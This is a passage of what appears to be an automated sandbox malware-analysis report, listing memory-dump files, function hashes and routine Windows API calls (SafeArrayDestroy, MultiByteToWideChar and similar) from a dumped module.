                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 79a8481db9707c0c7793648626287ed366d25ed449e8f48e297b30a067fac0fe
                                            • Instruction ID: d1115cb646a25011f5ee8d4e5029cb340ac32bcb2d4edeabaabce0563c6ff5dd
                                            • Opcode Fuzzy Hash: 79a8481db9707c0c7793648626287ed366d25ed449e8f48e297b30a067fac0fe
                                            • Instruction Fuzzy Hash: 4E313C70E016189FDB10CFA9CD80BAEB7B9AF85208F34868AE459E7745C771E981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 2f36d265bae95e9729f11afc9ad694381574ff39b579cfd0c070e2866c18c561
                                            • Instruction ID: bd8e573882898833c360aadea5a554a1505fb78b126fa261f5f542ac9877cd45
                                            • Opcode Fuzzy Hash: 2f36d265bae95e9729f11afc9ad694381574ff39b579cfd0c070e2866c18c561
                                            • Instruction Fuzzy Hash: DC311A70A016189FDB10CFA9CD80BAEB7B9AF85308F34859AE559E7741C771D981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: aa992451a3ca5555bb50b5c95d5feff7e80f287c7bbc7799332b9c55c694ca0a
                                            • Instruction ID: c47e91d2e388cae01a2815d5875ea9876e1524e1f429214789d1209cbc9b0da1
                                            • Opcode Fuzzy Hash: aa992451a3ca5555bb50b5c95d5feff7e80f287c7bbc7799332b9c55c694ca0a
                                            • Instruction Fuzzy Hash: 88313C70E016189FDB10CFA9CD80BAEB7B9AF85208F74858AE419E7741C775E981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 5c0895e87ffee52fdf3361bbcee23bb64d21883d658c8f63abc8e28a1688bf3d
                                            • Instruction ID: b1d86ecf0bd6195154509c25e4e84afca4529443025f0b70325f6aa01a39890c
                                            • Opcode Fuzzy Hash: 5c0895e87ffee52fdf3361bbcee23bb64d21883d658c8f63abc8e28a1688bf3d
                                            • Instruction Fuzzy Hash: 6C313A70E416189FCB10DFA9CD80BAEB7B9AF85208F34858AE419E7741C775E981CF50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: beb1b832390daca510f564c7702161bf5d32a2faa334fd253490b249b6130cc8
                                            • Instruction ID: 245235e1f80b95045e20a10b3d0fa862ff4332b095d8d7cc723e5fad3f377d23
                                            • Opcode Fuzzy Hash: beb1b832390daca510f564c7702161bf5d32a2faa334fd253490b249b6130cc8
                                            • Instruction Fuzzy Hash: EF314BB0E016189FCB10CBA9CE84BADB7B9AF99308F30859AE558E7741C771D9818F50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 5c0895e87ffee52fdf3361bbcee23bb64d21883d658c8f63abc8e28a1688bf3d
                                            • Instruction ID: 301851f59096b9d46c8bc7c2335cc15f0638b5dd0c5d7a5a39e84764b19546da
                                            • Opcode Fuzzy Hash: 5c0895e87ffee52fdf3361bbcee23bb64d21883d658c8f63abc8e28a1688bf3d
                                            • Instruction Fuzzy Hash: FA314BB0A016189FCB10CBA9CD84BADF7B9AF95308F30859AE458E7741C775DD818F50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 04a71124eec1266f15032bede2c8fb1ce971f07ab39ab5b12e898db1874695ab
                                            • Instruction ID: 2f2ab757f9c1ec67bbd0b46e306f859c86b94314166ffa01c2f4a1f43c8df9fe
                                            • Opcode Fuzzy Hash: 04a71124eec1266f15032bede2c8fb1ce971f07ab39ab5b12e898db1874695ab
                                            • Instruction Fuzzy Hash: 71316BB0E016189FDB10CBA9CD84BADB7BAAF95208F30859AE458E7741C771ED818F50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 1dbc0cb078bd0959133217d36a2e6ff6032a9aafaf621a5f94095e7272368a57
                                            • Instruction ID: 64650032269d5e2074c6de2ff6248ab0319a8547b6661ce650e05a417f59df6d
                                            • Opcode Fuzzy Hash: 1dbc0cb078bd0959133217d36a2e6ff6032a9aafaf621a5f94095e7272368a57
                                            • Instruction Fuzzy Hash: 72314BB0A016189FCB10CFA9CD84BADB7B9AF99304F30869AE458E7745C771E9858F50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: 79a8481db9707c0c7793648626287ed366d25ed449e8f48e297b30a067fac0fe
                                            • Instruction ID: c453192eca7b5b4fee404bf899f929ae85d4ad7f2dc19bf8cd40a15ded1a1f95
                                            • Opcode Fuzzy Hash: 79a8481db9707c0c7793648626287ed366d25ed449e8f48e297b30a067fac0fe
                                            • Instruction Fuzzy Hash: D6314DB0E016189FCB10CFA9CD84BADB7B9AF95204F30869AE458E7745C771E9818F50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23B3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23C3
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23D6
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23E9
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB23FC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEB240F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: aa992451a3ca5555bb50b5c95d5feff7e80f287c7bbc7799332b9c55c694ca0a
                                            • Instruction ID: 515d3d362c7128beedc860827c5022d1e8bc583ad7317f21f17de0edb69941c7
                                            • Opcode Fuzzy Hash: aa992451a3ca5555bb50b5c95d5feff7e80f287c7bbc7799332b9c55c694ca0a
                                            • Instruction Fuzzy Hash: 92314BB0E016189FCB10CFA9CD84BADF7B9AF99208F30859AE458EB741C775E9418F50
                                            APIs
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArrayDestroySafe
                                            • String ID:
                                            • API String ID: 4225690600-0
                                            • Opcode ID: beb1b832390daca510f564c7702161bf5d32a2faa334fd253490b249b6130cc8
                                            • Instruction ID: 66608838512867efaaa93b1846476dda60df44d227015f26623438c86368b8d3
                                            • Opcode Fuzzy Hash: beb1b832390daca510f564c7702161bf5d32a2faa334fd253490b249b6130cc8
                                            • Instruction Fuzzy Hash: 30315C70E016189FCB10CFA8CD80BAEB7B9AF85208F30858AE419E7741C771D981CF50
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000100,?,?,?,?,?,6CF025B1,?,00000000,?), ref: 6CF024E6
                                            • _malloc.LIBCMT ref: 6CF0251B
                                            • _memset.LIBCMT ref: 6CF0253B
                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000,00000001,00000000), ref: 6CF02550
                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6CF0255E
                                            • __freea.LIBCMT ref: 6CF02568
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$StringType__freea_malloc_memset
                                            • String ID:
                                            • API String ID: 525495869-0
                                            • Opcode ID: d032ead4f75aab4780f36bfa91b69502e6d85036f69180bb380ed93caf66dc0e
                                            • Instruction ID: 0d850866776ee0e87a4ca283e9fd2e82b186f72d4ba1462881ccca0cee26668d
                                            • Opcode Fuzzy Hash: d032ead4f75aab4780f36bfa91b69502e6d85036f69180bb380ed93caf66dc0e
                                            • Instruction Fuzzy Hash: 8031BFB170020AAFEF008F65DCA4DAF7BB9EB08758F210029F914D7650E732DD149B60
                                            APIs
                                              • Part of subcall function 6CEB69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEB6A08
                                              • Part of subcall function 6CEB69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEB6A15
                                              • Part of subcall function 6CEB69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEB6A41
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE63
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE73
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE86
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAE99
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEAC
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6CEBAEBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Destroy$Bound$Element
                                            • String ID:
                                            • API String ID: 757764206-0
                                            • Opcode ID: 43f87826ed93d798f1b43a4f0cf21625e845d542232a455242a23ab19cedc63b
                                            • Instruction ID: 23f9354900c866581d3f88e01655e12774461ffba885a714339a6874d4299ebd
                                            • Opcode Fuzzy Hash: 43f87826ed93d798f1b43a4f0cf21625e845d542232a455242a23ab19cedc63b
